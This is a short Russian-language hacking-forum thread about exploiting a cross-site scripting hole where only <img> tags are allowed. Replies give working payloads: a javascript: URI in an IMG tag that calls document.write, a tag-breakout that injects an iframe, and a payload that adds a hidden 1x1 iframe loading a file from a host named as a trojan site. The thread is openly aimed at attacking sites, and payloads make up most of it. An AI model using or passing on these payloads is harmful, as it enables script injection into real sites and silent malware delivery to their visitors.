Возможно ли при наличии ХSS вида: <IMG SRC="javascript:alert('XSS');"> выполнить html код, например <iframe>?

P.S Разрешенные теги только <img> =\
...

Возможно:
<IMG SRC="javascript:document.write('[html код]');">

ЗЫ все гениальное просто :)

Спасибо оч помог, но вот еще есть одна проблема,
при выполнении происходит редирект на пустую страницу, возможно ли этого как то избежать?

Это не редирект, это жаваскрипт всё стирает и создаёт вместо этого фреймы, была такаяже трабла, на форуме постали в мануал и в общем не избежать этого :)

А вы не думали поставить ифрейм на страницу с XSS и на страницу которую надо проифреймить

Например
javascript:document.write('<iframe width=100% height=100% src="http://forum.antichat.ru/"></iframe><iframe width=1 height=1 src="http://vasyaHacker.rulez.troyan.co.ua/file.php"></iframe>');

И вообще, если ничего не фильтруется, попробуй обойти тег, то есть:
<IMG SRC=""><iframe.........>">

Почитай статьи о XSS и всё поймёшь %)